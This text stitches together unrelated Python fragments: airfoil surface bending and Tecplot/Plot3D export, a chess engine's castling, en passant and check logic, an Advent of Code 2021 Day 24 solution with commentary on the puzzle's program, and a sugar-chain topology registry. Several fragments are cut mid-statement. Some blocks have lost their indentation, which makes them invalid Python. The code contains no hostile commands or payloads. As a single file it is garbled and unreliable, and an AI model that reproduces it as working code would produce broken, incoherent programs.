    for i_surf in range(i0, i1):
        sec0 = self.secs[i_surf]
        sec1 = self.secs[i_surf + 1]
        ns = self.surfs[i_surf][0].shape[0]
        for j in range(ns):
            # Transition of inner sections: skip the first/last spanwise row
            # of the boundary pieces so shared edges stay untouched.
            if i_sec0 != 0 and j == 0:
                if i_surf == i0:
                    continue
            if i_sec1 != self.n_sec - 1 and j == ns - 1:
                if i_surf == i1 - 1:
                    continue
            # Start bending
            xx = self.surfs[i_surf][0][j, :]
            yy = self.surfs[i_surf][1][j, :]
            zz = self.surfs[i_surf][2][j, :]
            nn = xx.shape[0]
            zLE = zz[0]
            xLE = leader_x(zLE)
            yLE = leader_y(zLE)
            # Original leading edge coordinates (linear blend of the two sections)
            tt = 1.0 * j / (ns - 1.0)
            x0 = (1 - tt) * sec0.xLE + tt * sec1.xLE
            y0 = (1 - tt) * sec0.yLE + tt * sec1.yLE
            c0 = (1 - tt) * sec0.chord + tt * sec1.chord
            #* Rotation of x-axis (dy/dz)
            if rot_x:
                angle = -np.arctan(leader_y(zLE, 1)) / np.pi * 180.0
                # xx, yy, zz = rotate(xx, yy, zz, angle=angle, origin=[xLE, yLE, zLE])
                xx, yy, zz = rotate(xx, yy, zz, angle=angle, origin=[x0, y0, zLE])
            #* Translation
            if spline_chord:
                xx, _, yy, _ = transform(xx, xx, yy, yy, dx=xLE - x0, dy=yLE - y0,
                                         x0=xLE, y0=yLE, scale=leader_c(zLE) / c0)
            else:
                i_half = int(np.floor(nn / 2.0))
                if abs(xx[i_half] - x0) > 1e-6 or abs(yy[i_half] - y0) > 1e-6:
                    #* The location of curve end is fixed
                    #  Single piece of open curve to be bent
                    xx, yy = stretch_fixed_point(xx, yy, dx=xLE - x0, dy=yLE - y0,
                                                 xm=x0, ym=y0, xf=xx[-1], yf=yy[-1])
                else:
                    #* The locations of the trailing edge of upper and lower surface are fixed
                    #  An airfoil (containing both upper and lower surfaces) to be bent
                    #  Original leading edge:  x0, xu[0], xl[-1]
                    #  New leading edge:       xLE
                    #  Original trailing edge: xu[-1], xl[0]
                    xu = xx[i_half:]
                    xl = xx[:i_half + 1]
                    yu = yy[i_half:]
                    yl = yy[:i_half + 1]
                    xu, yu = stretch_fixed_point(xu, yu, dx=xLE - x0, dy=yLE - y0,
                                                 xm=x0, ym=y0, xf=xu[-1], yf=yu[-1])
                    xl, yl = stretch_fixed_point(xl, yl, dx=xLE - x0, dy=yLE - y0,
                                                 xm=x0, ym=y0, xf=xl[0], yf=yl[0])
                    xx = np.concatenate((xl, xu[1:]), axis=0)
                    yy = np.concatenate((yl, yu[1:]), axis=0)
            self.surfs[i_surf][0][j, :] = xx.copy()
            self.surfs[i_surf][1][j, :] = yy.copy()
            self.surfs[i_surf][2][j, :] = zz.copy()
def Surf2Cylinder(self, flip=True, origin=None):
    '''
    Bend the surface (surfs) to cylinder (turbomachinery).
    The original surface is constructed by 2D sections.

    ### Inputs:
    ```text
    flip:   if True, flip X
    origin: default None, i.e., the cylinder origin axis is Z-axis for all sections
            otherwise, provide a list of actual cylinder origins, [O0, O1, ...]
            list length is the number of sections
            each element is the cylinder origin of that section, i.e., [xO, yO]
            can be ndarray or list
    ```
    '''
    if origin is None:
        # Cylinder origin axis is the Z-axis for every section.
        for surf in self.surfs:
            for j in range(surf[0].shape[0]):
                x, y, z = toCylinder(surf[0][j, :], surf[1][j, :], surf[2][j, :], flip=flip)
                surf[0][j, :] = x.copy()
                surf[1][j, :] = y.copy()
                surf[2][j, :] = z.copy()
        for sec in self.secs:
            sec.x, sec.y, sec.z = toCylinder(sec.x, sec.y, sec.z, flip=flip)
        return

    for i, surf in enumerate(self.surfs):
        ns = surf[0].shape[0]
        for j in range(ns):
            #! This linear interpolation of origins
            #! causes non-smooth surface even when the smooth function is used
            tt = j / (ns - 1.0)
            x0 = (1 - tt) * origin[i][0] + tt * origin[i + 1][0]
            y0 = (1 - tt) * origin[i][1] + tt * origin[i + 1][1]
            x, y, z = toCylinder(surf[0][j, :], surf[1][j, :], surf[2][j, :], flip=flip, origin=[x0, y0])
            surf[0][j, :] = x.copy()
            surf[1][j, :] = y.copy()
            surf[2][j, :] = z.copy()
    for i in range(self.n_sec):
        sec = self.secs[i]
        sec.x, sec.y, sec.z = toCylinder(sec.x, sec.y, sec.z, flip=flip, origin=origin[i])
def read_cylinder_origins(self, fname):
    '''
    Read in origins of each section from file.

    >>> origins = read_cylinder_origins(fname)

    ### Inputs:
    ```text
    fname: settings file name
    ```
    '''
    if not os.path.exists(fname):
        raise Exception(fname+' does not exist for surface read setting')
    # Maps a recognized keyword line to the parser state that consumes it.
    key_dict = {'CylinderOrigin:': 9}
    origins = []
    found_surf = False  # True once inside the [Surf] block matching self.name
    found_key = 0       # pending key state (9 => origin lines follow)
    with open(fname, 'r') as f:
        lines = f.readlines()
        iL = 0
        while iL < len(lines):
            line = lines[iL].split()
            if len(line) < 1:
                # Skip blank lines.
                iL += 1
                continue
            if not found_surf and len(line) > 1:
                # Look for the "[Surf] <name>" header of this surface.
                if '[Surf]' in line[0] and self.name == line[1]:
                    found_surf = True
            elif found_surf and '[Surf]' in line[0]:
                # Reached the next surface block: stop scanning.
                break
            elif found_surf and found_key == 0:
                if line[0] in key_dict:
                    found_key = key_dict[line[0]]
            elif found_surf and found_key == 9:
                # Consume n_sec origin lines ("xO yO" per section).
                # NOTE(review): iL is advanced *before* each read, so parsing
                # starts at the line after the current one — confirm against
                # the settings-file layout that no origin line is skipped.
                for i in range(self.n_sec):
                    iL += 1
                    line = lines[iL].split()
                    origins.append([float(line[0]), float(line[1])])
                found_key = 0
            else:
                # Lines that are not relevant
                pass
            iL += 1
    return origins
def output_tecplot(self, fname=None, one_piece=False):
    '''
    Output the surface to *.dat in Tecplot format.

    ### Inputs:
    ```text
    fname:     the name of the file (default: self.name + '.dat')
    one_piece: True ~ combine the spanwise sections into one piece
    ```
    '''
    # surf_x[ns,nt], ns => spanwise
    if fname is None:
        fname = self.name + '.dat'
    n_sec = 1 if self.l2d else self.n_sec - 1
    n_piece = len(self.surfs)
    with open(fname, 'w') as f:
        f.write('Variables= X Y Z \n ')
        nt = self.surfs[0][0].shape[1]
        ns = self.ns
        if one_piece:
            # All spanwise pieces merged into a single zone; interior pieces
            # drop their last row so shared sections are not duplicated.
            n_point = n_sec * (self.ns - 1) + 1
            f.write('zone T="sec" i= %d j= %d \n' % (nt, n_point))
            for i_sec in range(n_piece):
                surf_x = self.surfs[i_sec][0]
                surf_y = self.surfs[i_sec][1]
                surf_z = self.surfs[i_sec][2]
                i_add = 0 if i_sec >= n_piece - 2 else 1
                for i in range(ns - i_add):
                    for j in range(nt):
                        f.write(' %.9f %.9f %.9f\n' % (surf_x[i, j], surf_y[i, j], surf_z[i, j]))
        else:
            # One Tecplot zone per spanwise piece.
            for i_sec in range(n_piece):
                surf_x = self.surfs[i_sec][0]
                surf_y = self.surfs[i_sec][1]
                surf_z = self.surfs[i_sec][2]
                f.write('zone T="sec %d" i= %d j= %d \n' % (i_sec, nt, ns))
                for i in range(ns):
                    for j in range(nt):
                        f.write(' %.9f %.9f %.9f\n' % (surf_x[i, j], surf_y[i, j], surf_z[i, j]))
def output_plot3d(self, fname=None):
'''
Output the surface to *.grd in plot3d format
### Inputs:
```text
fname: the name of the file
```
'''
if fname is None:
fname = self.name + '.grd'
n_piece = len(self.surfs)
# X[ns][nn], ns => spanwise
X = self.surfs[0][0]
ns = X.shape[0]
nn = X.shape[1]
with open(fname, 'w') as f:
f.write('%d \n '%(n_piece)) # Number of surfaces
for i_sec in range(n_piece):
f.write('%d | |
figure.name == Name.Pawn:
if number_of_moved_squares == 2:
if figure.color == Color.White and curr_position[0] != 2:
return False
if figure.color == Color.Black and curr_position[0] != 7:
return False
if move[1] != 0 and not self.is_en_passant(figure, target):
if figure.color == Color.White and target not in pos_black:
return False
if figure.color == Color.Black and target not in pos_white:
return False
else:
if target in pos_black or target in pos_white:
return False
for i in range(1, number_of_moved_squares):
test_position = (curr_position[0] + i * dx, curr_position[1] + i * dy)
if test_position in pos_white or test_position in pos_black:
return False
return True
def is_castling_legal(self, king, target):
    '''
    Check whether castling is possible.  The necessary conditions are:
    - castling takes place on the back rank
    - the king and the rook have not moved during the whole game
      (tracked by the *_short_castle / *_long_castle flags)
    - there is no other piece between the rook and the king
    - the king is not in check
    - the king does not pass through a square where it would be in check
    - the king does not end the castling in check
    '''
    # Refactor note: the four original copy-pasted branches
    # (white/black x short/long) are collapsed into one parameterized path.
    if king.name != Name.King:
        return False
    # The back rank and the castling-rights flags depend on the color.
    if king.color == Color.White:
        row = 1
        short_allowed = self.white_short_castle
        long_allowed = self.white_long_castle
    else:
        row = 8
        short_allowed = self.black_short_castle
        long_allowed = self.black_long_castle
    if target[1] == 7 and short_allowed:
        rook_col = 8        # king-side rook
        between = (6, 7)    # squares that must be empty
        king_path = (6, 7)  # squares the king crosses / lands on
    elif target[1] == 3 and long_allowed:
        rook_col = 1        # queen-side rook
        between = (2, 3, 4)
        king_path = (4, 3)
    else:
        return False
    rook = self.get_figure_by_pos((row, rook_col))
    if rook is None or rook.name != Name.Rook or rook.color != king.color:
        return False
    for col in between:
        if self.get_figure_by_pos((row, col)) is not None:
            return False
    # The king may not castle out of check...
    if self.is_king_in_check_now(king.color):
        return False
    # ...nor through or into check.  The king is moved temporarily and is
    # always restored to its home square (row, 5) before returning.
    for col in king_path:
        king.position = (row, col)
        if self.is_king_in_check_now(king.color):
            king.position = (row, 5)
            return False
    king.position = (row, 5)
    return True
def is_en_passant(self, pawn, target):
    # Only a pawn of the side to move may capture en passant, and only onto
    # the square recorded after the opponent's two-square pawn advance.
    if pawn.name != Name.Pawn:
        return False
    if pawn.color != self.current_color:
        return False
    return target == self.en_passant_position
def is_king_in_check_now(self, color):
    '''
    Return True when the king of the given color is attacked by any
    opposing piece still in play.
    '''
    king = self.get_figures_by_name(Name.King, color)[0]
    # Normally a move that would capture the king is not legal; here we need
    # exactly that, so the ignore_king flag skips that part of the move check.
    # Iterate over a copy of in_play so the move check cannot disturb it.
    return any(
        figure.color != color
        and self.is_move_possible(figure, king.position, ignore_king=True)
        for figure in list(self.in_play)
    )
def is_king_in_check_after(self, figure, target, *, color=None, promo_piece=None):
    '''
    Check whether the king [by default of the same color as the figure] is
    in check after the given move has been performed.  The move is applied
    temporarily; once the answer is known, the state is restored.
    '''
    if color is None:
        color = figure.color
    # En passant removes the pawn that just moved, not the piece on `target`.
    if self.is_en_passant(figure, target):
        removed_piece = self.get_figure_by_pos(self.last_move.target)
    else:
        removed_piece = self.get_figure_by_pos(target)
    if removed_piece:
        self.remove_from_play(removed_piece)
    # Remember everything that must be restored afterwards.
    starting_position = figure.position
    en_passant = self.en_passant_position
    castling = self.is_castling_legal(figure, target)
    if castling:
        if figure.color == Color.White:
            row = 1
        else:
            row = 8
        # Move the matching rook as well, so the check test sees the
        # position after the complete castling move.
        if target[1] == 7:
            rook = self.get_figure_by_pos((row, 8))
            rook_starting = rook.position
            self.move_figure_to(rook, (row, 6))
        elif target[1] == 3:
            rook = self.get_figure_by_pos((row, 1))
            rook_starting = rook.position
            self.move_figure_to(rook, (row, 4))
        self.move_figure_to(figure, target)
    else:
        self.move_figure_to(figure, target, promo_piece=promo_piece)
    answer = self.is_king_in_check_now(color)
    # Undo the temporary move.
    if promo_piece is not None:
        self.undo_promotion(figure)
    if removed_piece:
        self.in_play.add(removed_piece)
        self.captured.remove(removed_piece)
    figure.position = starting_position
    self.en_passant_position = en_passant
    if castling:
        # NOTE(review): only the rook's position is restored here; if
        # move_figure_to records other state (e.g. last_move), that is
        # presumably restored elsewhere — confirm.
        rook.position = rook_starting
    return answer
    def pawn_legal_moves(self, figure):
        '''
        From all possible pawn moves, return those that are legal, as
        ``(move, notation_info)`` pairs.
        '''
        moves = []
        pos_white, pos_black = self.generate_positions()
        for dx, dy in figure.possible_moves:
            target = (figure.position[0] + dx, figure.position[1] + dy)
            # Skip targets that fall off the 8x8 board.
            if target[0] not in range(1, 9) or target[1] not in range(1, 9):
                continue
            if dx in {-2, 2}:
                # Double step: only from the starting rank, and both the
                # skipped square and the target square must be empty.
                if figure.color == Color.White and figure.position[0] != 2:
                    continue
                if figure.color == Color.Black and figure.position[0] != 7:
                    continue
                blockade = (figure.position[0] + dx // 2, figure.position[1])
                if blockade in pos_black or blockade in pos_white:
                    continue
                if target in pos_black or target in pos_white:
                    continue
            elif dy != 0 and not self.is_en_passant(figure, target):
                # Diagonal step that is not en passant: must capture an enemy.
                if figure.color == Color.White and target not in pos_black:
                    continue
                if figure.color == Color.Black and target not in pos_white:
                    continue
            else:
                # Plain forward step (or en passant): target must be empty.
                if target in pos_black or target in pos_white:
                    continue
            if target[0] not in {1, 8}:
                if not self.is_king_in_check_after(figure, target):
                    move = self.get_move(figure, target)
                    notation_info = self.get_notation_info(figure, target)
                    moves.append((move, notation_info))
            else:
                # Reaching the last rank: emit one move per promotion piece.
                for promo_piece in PROMOTION_PIECES:
                    if not self.is_king_in_check_after(figure, target, promo_piece=promo_piece):
                        move = self.get_move(figure, target, promo_piece=promo_piece)
                        notation_info = self.get_notation_info(figure, target, promo_piece=promo_piece)
                        moves.append((move, notation_info))
        return moves
def king_or_knight_legal_moves(self, figure):
'''
Izmed vseh možnih premikov kralja oziroma skakača, vrnemo vse legalne.
'''
moves = []
pos_white, pos_black = self.generate_positions()
for dx, dy in figure.possible_moves:
target = (figure.position[0] + dx, figure.position[1] + dy)
if target[0] not in range(1, 9) or target[1] not in range(1, 9):
continue
if figure.color == Color.White and target in pos_white:
continue
if figure.color == Color.Black and target in pos_black:
continue
if not self.is_king_in_check_after(figure, target):
move = self.get_move(figure, target)
notation_info = self.get_notation_info(figure, target)
moves.append((move, notation_info))
if figure.name == Name.King:
for dy in {-2, 2}:
target = (figure.position[0], figure.position[1] + dy)
if self.is_castling_legal(figure, target):
move = self.get_move(figure, target, castling_checked=True)
notation_info = self.get_notation_info(figure, target)
moves.append((move, notation_info))
return moves
    def figure_legal_moves(self, figure):
        '''
        Generate all legal moves of the given figure.  Pawns, kings and
        knights are handled by helper methods; for bishops, rooks and queens
        we scan outwards along the relevant rays until each ray is blocked or
        leaves the board.
        '''
        if figure.name == Name.Pawn:
            return self.pawn_legal_moves(figure)
        elif figure.name == Name.King or figure.name == Name.Knight:
            return self.king_or_knight_legal_moves(figure)
        else:
            moves = []
            pos_white, pos_black = self.generate_positions()
            # seen[i] == True means ray i is exhausted (blocked or off-board).
            seen = [False] * 8
            '''
            Direction indices (relative to the figure):
                5 6 7
                3   4
                0 1 2
            '''
            if figure.name == Name.Rook:
                # Rooks never move diagonally: mark the diagonal rays done.
                for i in {0, 2, 5, 7}:
                    seen[i] = True
            elif figure.name == Name.Bishop:
                # Bishops never move straight: mark the straight rays done.
                for i in {1, 3, 4, 6}:
                    seen[i] = True
            for r in range(1, 8):
                if all(seen):
                    break
                for idx, (dx, dy) in enumerate(DIRECTIONS):
                    if seen[idx]:
                        continue
                    target = (figure.position[0] + r * dx, figure.position[1] + r * dy)
                    if target[0] not in range(1, 9) or target[1] not in range(1, 9):
                        seen[idx] = True
                        continue
                    if figure.color == Color.White:
                        if target in pos_white:
                            # Own piece blocks the ray; square not reachable.
                            seen[idx] = True
                            continue
                        elif target in pos_black:
                            # Capture square: reachable, but the ray ends here.
                            seen[idx] = True
                    else:
                        if target in pos_black:
                            seen[idx] = True
                            continue
                        elif target in pos_white:
                            seen[idx] = True
                    if not self.is_king_in_check_after(figure, target):
                        move = self.get_move(figure, target)
                        notation_info = self.get_notation_info(figure, target)
                        moves.append((move, notation_info))
            return moves
def all_legal_moves(self, color):
'''
Eno po eno generiramo vse legalne poteze, ki jih lahko igralec opravi.
'''
for figure in list(self.in_play):
if figure.color != color:
continue
yield from self.figure_legal_moves(figure)
def is_mate_after(self, figure, target, *, color=None, promo_piece=None):
'''
Preverimo, ali ima igralec [privzeto nasprotnik od barve figure] kakšno legalno potezo
po premiku. Nato ponastavimo stanje na začetno.
'''
if color is None:
color = other_color(figure.color)
if self.is_en_passant(figure, target):
removed_piece = self.get_figure_by_pos(self.last_move.target)
else:
removed_piece = self.get_figure_by_pos(target)
if removed_piece:
self.remove_from_play(removed_piece)
starting_position = figure.position
en_passant = self.en_passant_position
castling = self.is_castling_legal(figure, target)
if castling:
if figure.color == Color.White:
row = 1
else:
row = 8
if target[1] == 7:
rook = self.get_figure_by_pos((row, 8))
rook_starting = rook.position
self.move_figure_to(rook, (row, 6))
elif target[1] == 3:
| |
# Repository: andypymont/adventofcode
"""
2021 Day 24
https://adventofcode.com/2021/day/24
"""
from collections import deque
from typing import List, Set, Tuple
import aocd # type: ignore
# Finding the (mostly) repeated pattern in the input program:
# 01 02 03 04 05 06 07
# inp w inp w inp w inp w inp w inp w inp w
# mul x 0 mul x 0 mul x 0 mul x 0 mul x 0 mul x 0 mul x 0
# add x z add x z add x z add x z add x z add x z add x z
# mod x 26 mod x 26 mod x 26 mod x 26 mod x 26 mod x 26 mod x 26
# div z 1 div z 1 div z 1 div z 26 div z 1 div z 26 div z 1
# add x 12 add x 10 add x 10 add x -6 add x 11 add x -12 add x 11
# eql x w eql x w eql x w eql x w eql x w eql x w eql x w
# eql x 0 eql x 0 eql x 0 eql x 0 eql x 0 eql x 0 eql x 0
# mul y 0 mul y 0 mul y 0 mul y 0 mul y 0 mul y 0 mul y 0
# add y 25 add y 25 add y 25 add y 25 add y 25 add y 25 add y 25
# mul y x mul y x mul y x mul y x mul y x mul y x mul y x
# add y 1 add y 1 add y 1 add y 1 add y 1 add y 1 add y 1
# mul z y mul z y mul z y mul z y mul z y mul z y mul z y
# mul y 0 mul y 0 mul y 0 mul y 0 mul y 0 mul y 0 mul y 0
# add y w add y w add y w add y w add y w add y w add y w
# add y 6 add y 2 add y 13 add y 8 add y 13 add y 13 add y 3
# mul y x mul y x mul y x mul y x mul y x mul y x mul y x
# add z y add z y add z y add z y add z y add z y add z y
# 08 09 10 11 12 13 14
# inp w inp w inp w inp w inp w inp w inp w
# mul x 0 mul x 0 mul x 0 mul x 0 mul x 0 mul x 0 mul x 0
# add x z add x y add x z add x z add x z add x z add x z
# mod x 26 mod x 26 mod x 26 mod x 26 mod x 26 mod x 26 mod x 26
# div z 1 div z 1 div z 26 div z 26 div z 26 div z 26 div z 26
# add x 12 add x 12 add x -2 add x -5 add x -4 add x -4 add x -12
# eql x w eql x w eql x w eql x w eql x w eql x w eql x w
# eql x 0 eql x 0 eql x 0 eql x 0 eql x 0 eql x 0 eql x 0
# mul y 0 mul y 0 mul y 0 mul y 0 mul y 0 mul y 0 mul y 0
# add y 25 add y 25 add y 25 add y 25 add y 25 add y 25 add y 25
# mul y x mul y x mul y x mul y x mul y x mul y x mul y x
# add y 1 add y 1 add y 1 add y 1 add y 1 add y 1 add y 1
# mul z y mul z y mul z y mul z y mul z y mul z y mul z y
# mul y 0 mul y 0 mul y 0 mul y 0 mul y 0 mul y 0 mul y 0
# add y w add y w add y w add y w add y w add y w add y w
# add y 11 add y 10 add y 8 add y 14 add y 6 add y 8 add y 2
# mul y x mul y x mul y x mul y x mul y x mul y x mul y x
# add z y add z y add z y add z y add z y add z y add z y
# There are two variations:
# Variation A:
# inp w
# mul x 0
# add x z
# mod x 26
# div z 1
# add x VAR1
# eql x w
# eql x 0
# mul y 0
# add y 25
# mul y x
# add y 1
# mul z y
# mul y 0
# add y w
# add y VAR2
# mul y x
# add z y
# In this variation, VAR1 is always >=10, therefore it always results in x = 1:
# mul x 0 x = 0
# add x z x = z
# mod x 26 x = x % 26
# div z 1
# add x 10 x = (x % 26) + 10
# eql x w [2-digit number] == [1-digit number] - always False, therefore x = 0
# eql x 0 x = 1
# This results in the stored 'z' value being multiplied by 26 and the new number (INP + VAR2) being
# added to it.
# Variation B:
# inp w
# mul x 0
# add x z
# mod x 26
# div z 26
# add x VAR1
# eql x w
# eql x 0
# mul y 0
# add y 25
# mul y x
# add y 1
# mul z y
# mul y 0
# add y w
# add y VAR2
# mul y x
# add z y
# In this variation, VAR1 is negative and the existing z value is divided by 26 on the 5th line.
# There are two possibilities - the value of z % 26 calculated on line 4 and then removed from the
# z-total on line 5 is either equal to -VAR1 or it is not.
# MATCHED NOT MATCHED
# inp w w = INP w = INP
# mul x 0 x = 0 x = 0
# add x z x = z x = z
# mod x 26 x = z % 26 x = z % 26
# div z 26 z //= 26 z //= 26
# add x VAR1 x = (z % 26) + VAR1 x = (z % 26) + VAR1
# eql x w x = 1 if (z % 26) + VAR1 == INP else 0 x = 1 if (z % 26) + VAR1 == INP else 0
# eql x 0 x = 0 x = 1
# mul y 0 y = 0 y = 0
# add y 25 y = 25 y = 25
# mul y x y = 0 y = 25
# add y 1 y = 1 y = 26
# mul z y z *= 1 z *= 26
# mul y 0 y = 0 y = 0
# add y w y = INP y = INP
# add y VAR2 y = INP + VAR2 y = INP + VAR2
# mul y x y = 0 y = (INP + VAR2)
# add z y z += 0 z += (INP + VAR2)
# If we want to aim for a z value of 0 at the program's conclusion, we need to avoid the VAR2 value
# being added to z, therefore we need the z % 26 value to match -VAR1. This will | |
#-*-coding:Utf-8-*-
__author__ ="<NAME>"
__version__ = "1.0.1"
__license__ = "BSD"
import json
import re,os,string
from utils import Logger,Atom
from enum import Enum
class SingletonTopo:
    """
    Class-level ("singleton") registry of the polysaccharide topology: the
    ose units, the osidic bonds between them, and the oses whose anomeric
    carbon is still free.

    NOTE(review): methods are defined without ``self``/``@staticmethod`` and
    are intended to be called through the class, e.g.
    ``SingletonTopo.addOse(ose)``.
    """
    OSE_LIST = {}  # maps ose number -> OseModel object (or a string for substitutions)
    """
    "static" dictionary with ose model identifier as key and ose model object as value
    """
    OBOND_LIST = []  # each bond records the two linked oses and the two carbon numbers involved
    """
    "static" list of OsidicBond objects
    """
    C1FREE=[]
    """
    ose identifiers without osidic binding on anomeric carbon
    """
    DEFAULT_LINK=[1,4]
    DEFAULT_OSETYPE={"nct":6,"ncc":5,"startc":1,"name":""}
    def addOse(ose):
        """
        Register ``ose`` in OSE_LIST, assigning a fresh identifier when it has
        none, and record its anomeric carbon as free.
        """
        # ose comes from the design interface: no id yet, allocate one
        if ose.oseid==None:
            OseModel.NUM_OSE+=1
            ose.oseid=OseModel.NUM_OSE
        # ose comes from a graph (loaded format): keep its id, advance counter
        else:
            if ose.oseid>OseModel.NUM_OSE:
                OseModel.NUM_OSE=ose.oseid
        # NOTE(review): stored under NUM_OSE, not ose.oseid -- for a loaded ose
        # whose id is below the counter these differ; confirm load order
        # guarantees ose.oseid == NUM_OSE here.
        SingletonTopo.OSE_LIST[OseModel.NUM_OSE]=ose
        SingletonTopo.C1FREE.append(ose.oseid)
    def deledge(ob):
        """Remove bond ``ob``; if it occupied the child's anomeric carbon,
        mark that carbon as free again."""
        SingletonTopo.OBOND_LIST.remove(ob)
        if ob.child_carbon==SingletonTopo.OSE_LIST[ob.child_ose].startcycle:
            SingletonTopo.C1FREE.append(ob.child_ose)
    def addEdge(osefrom,carbfrom,oseto,carbto):
        """
        Create an osidic bond from carbon ``carbfrom`` of ose ``osefrom`` to
        carbon ``carbto`` of ose ``oseto``, mark both carbons as bound, and
        remove any anomeric carbon that just got used from C1FREE.

        :return: the new OsidicBond object
        """
        ob=OsidicBond(osefrom,oseto,carbfrom,carbto)
        SingletonTopo.OBOND_LIST.append(ob)
        SingletonTopo.OSE_LIST[osefrom].bind_carb(carbfrom)
        SingletonTopo.OSE_LIST[oseto].bind_carb(carbto)
        if osefrom in SingletonTopo.C1FREE:
            if carbfrom==SingletonTopo.OSE_LIST[osefrom].startcycle:
                SingletonTopo.C1FREE.remove(osefrom)
        if oseto in SingletonTopo.C1FREE:
            if carbto==SingletonTopo.OSE_LIST[oseto].startcycle:
                SingletonTopo.C1FREE.remove(oseto)
        return ob
    def get_parent(oseid):
        """Return the parent ose id of ``oseid``, or None if it has no parent."""
        for ob in SingletonTopo.OBOND_LIST:
            if ob.child_ose==oseid:
                return ob.parent_ose
        return None
    def get_osidicbonds(oseid1,oseid2=None):
        """
        Return all bonds involving ``oseid1`` (and also involving ``oseid2``
        when given).
        """
        result=[]
        for ob in SingletonTopo.OBOND_LIST:
            if ob.contains(oseid1):
                if oseid2:
                    if ob.contains(oseid2):
                        result.append(ob)
                else:
                    result.append(ob)
        return result
    def remove_oid(oid):
        """
        Remove ose ``oid`` from the registry: delete every bond it takes part
        in, free the partner carbons, and drop it from OSE_LIST and C1FREE.
        """
        bonds=SingletonTopo.get_osidicbonds(oid)
        om=SingletonTopo.OSE_LIST[oid]
        for bond in bonds:
            # Unbind the carbon on the *other* end of each bond.
            if oid==bond.parent_ose:
                SingletonTopo.OSE_LIST[bond.child_ose].unbind_carb(bond.child_carbon)
            else:
                SingletonTopo.OSE_LIST[bond.parent_ose].unbind_carb(bond.parent_carbon)
            SingletonTopo.OBOND_LIST.remove(bond)
        del SingletonTopo.OSE_LIST[oid]
        if oid in SingletonTopo.C1FREE:
            SingletonTopo.C1FREE.remove(oid)
        om=None
    def clear():
        """Reset the whole registry and the instance counters."""
        SingletonTopo.OSE_LIST={}
        SingletonTopo.OBOND_LIST.clear()
        SingletonTopo.C1FREE.clear()
        OseModel.NUM_OSE=0
        OsidicBond.NUM=0
    def strbondlist():
        """Return the list of string representations of all bonds."""
        lsb=[]
        for b in SingletonTopo.OBOND_LIST:
            lsb.append(b.getAttributString())
        return lsb
    def get_directedbond(parent):
        """Return the bonds whose parent ose is ``parent``."""
        bonds=[]
        for bond in SingletonTopo.OBOND_LIST:
            if bond.parent_ose==parent:
                bonds.append(bond)
        return bonds
    def topogrid():
        """
        assigns row and column numbers of oses into a grid according to carbon bindings
        """
        grid=SingletonTopo.__basegrid__()
        # Detect pairs of oses that landed on the same grid cell.
        conflict=[]
        oids=list(SingletonTopo.OSE_LIST.keys())
        for i in range(1,OseModel.NUM_OSE+1):
            for j in range(i+1,OseModel.NUM_OSE+1):
                if i in oids and j in oids:
                    if i in grid and j in grid:
                        coordi=grid[i]
                        coordj=grid[j]
                        if coordi==coordj:
                            conflict.append([i,j])
        if len(conflict)>0:
            # Resolve each collision by shifting the two branches (rooted at
            # the first distinct ancestors) one row apart.
            for collision in conflict:
                #print(("collision imgs:",collision))
                group1=[]
                group2=[]
                oid1=collision[0]
                oid2=collision[1]
                ancetres1=SingletonTopo.__parseTopo__([oid1],oid1,"end")
                ancetres2=SingletonTopo.__parseTopo__([oid2],oid2,"end")
                shared=set(ancetres1).intersection(set(ancetres2))
                if len(shared)>0:
                    for oid in shared:
                        ancetres1.remove(oid)
                        ancetres2.remove(oid)
                group1=SingletonTopo.__parseTopo__([],ancetres1[-1:][0],"start")
                group1.append(ancetres1[-1:][0])
                group2=SingletonTopo.__parseTopo__([],ancetres2[-1:][0],"start")
                group2.append(ancetres2[-1:][0])
                #print(ancetres1[-1:][0])
                #print(ancetres2[-1:][0])
                coords_ancetre1=grid[ancetres1[-1:][0]]
                coords_ancetre2=grid[ancetres2[-1:][0]]
                if coords_ancetre1[0]>coords_ancetre2[0]:
                    for elt in group1:
                        grid[elt][0]+=1
                    for elt in group2:
                        grid[elt][0]-=1
                else:
                    for elt in group1:
                        grid[elt][0]-=1
                    for elt in group2:
                        grid[elt][0]+=1
        #print(grid)
        return grid
    def __parseTopo__(branch,om,direction,limit=None):
        """
        Recursively collect ose ids reachable from ``om``: descendants when
        ``direction == "start"``, ancestors when ``direction == "end"``.
        ``limit`` optionally bounds the branch length.
        """
        if limit==None or len(branch)<limit:
            edge_next=[]
            bonds=SingletonTopo.get_osidicbonds(om)
            for bond in bonds:
                if direction=="start" and bond.parent_ose==om:
                    edge_next.append(bond.child_ose)
                if direction=="end" and bond.child_ose==om:
                    edge_next.append(bond.parent_ose)
            if len(edge_next)>0:
                bb=[]
                for e in edge_next:
                    bb+=SingletonTopo.__parseTopo__(branch+[e],e,direction,limit)
                return bb
            else:
                return branch
        else:
            return branch
    def __basegrid__(bond=None,grid=None):
        """
        Recursively place oses on a [row, col] grid, starting from the first
        ose with a free anomeric carbon and walking the directed bonds.
        Children go one column to the left; the row shifts with the parent
        carbon number of the bond.
        """
        bonds=[]
        if bond:
            Logger.debug(bond.getAttributString(),0)
            #print(bond.getAttributString())
        if grid==None:
            grid={}
            start=SingletonTopo.C1FREE[0]
            grid[start]=[0,0]
            bonds=SingletonTopo.get_directedbond(start)
        else:
            row=grid[bond.parent_ose][0]
            col=grid[bond.parent_ose][1]-1
            if bond.parent_carbon>=5:
                row-=1
            elif bond.parent_carbon in [2,3]:
                row+=1
                if bond.parent_carbon == 2:
                    col+=1
            grid[bond.child_ose]=[row,col]
            bonds=SingletonTopo.get_directedbond(bond.child_ose)
        if len(bonds)>0:
            for b in bonds:
                SingletonTopo.__basegrid__(b,grid)
        return grid
class OseModel:
    """
    Model of a single ose (sugar unit): ring geometry, per-carbon isomery
    marks ("D"/"L") and per-carbon substitution state.
    """
    NUM_OSE = 0
    """
    numbering of ose instances (unique identifier)
    """
    def __init__(self,ncc=None,nct=None,startc=None):
        """
        :param ncc: number of ring carbons (default from DEFAULT_OSETYPE)
        :param nct: total number of carbons (default from DEFAULT_OSETYPE)
        :param startc: number of the first ring carbon (default from
            DEFAULT_OSETYPE)
        """
        self.oseid=None
        self.name=""
        if startc:
            self.startcycle=startc
        else:
            self.startcycle=SingletonTopo.DEFAULT_OSETYPE["startc"]
        if ncc:
            self.ncc=ncc
        else:
            self.ncc=SingletonTopo.DEFAULT_OSETYPE["ncc"]
        if nct:
            self.nct=nct
        else:
            self.nct=SingletonTopo.DEFAULT_OSETYPE["nct"]
        self.modifs=[]
        iso=[]
        mods=[]
        # init carbon description table:
